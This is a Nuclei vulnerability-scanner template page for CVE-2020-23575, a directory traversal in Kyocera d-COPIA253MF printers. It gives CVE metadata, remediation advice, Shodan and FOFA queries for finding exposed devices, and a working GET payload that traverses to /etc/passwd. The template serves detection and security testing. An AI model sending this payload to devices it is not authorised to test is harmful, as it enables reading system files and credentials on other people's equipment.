Skip to content
Nuclei Templates

Kyocera Printer d-COPIA253MF - Directory Traversal

ID: CVE-2020-23575

Severity: high

Author: 0x_Akoko

Tags: cve2020,cve,printer,iot,lfi,edb,kyocera

Description

Section titled “Description”

Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.

YAML Source

Section titled “YAML Source”
id: CVE-2020-23575


info:
  name: Kyocera Printer d-COPIA253MF - Directory Traversal
  author: 0x_Akoko
  severity: high
  description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
  remediation: |
    Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/48561
    - https://nvd.nist.gov/vuln/detail/CVE-2020-23575
    - https://www.kyoceradocumentsolutions.com.tr/tr.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-23575
    cwe-id: CWE-22
    epss-score: 0.01689
    epss-percentile: 0.87694
    cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: kyocera
    product: d-copia253mf_plus_firmware
    shodan-query: http.favicon.hash:-50306417
    fofa-query: icon_hash=-50306417
  tags: cve2020,cve,printer,iot,lfi,edb,kyocera


http:
  - method: GET
    path:
      - "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root:.*:0:0:"
          - "bin:.*:1:1"
        condition: or


      - type: status
        status:
          - 200
# digest: 4a0a0047304502201ba395d1e6f4d97cf7b632d43c4e79510b57c3e981adde12af89833757af655e0221008bfb03e19b9d91ff7a61e64e89a1bd0c9b682443efd5bdb8c4c0816009139154:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-23575.yaml"

View on Github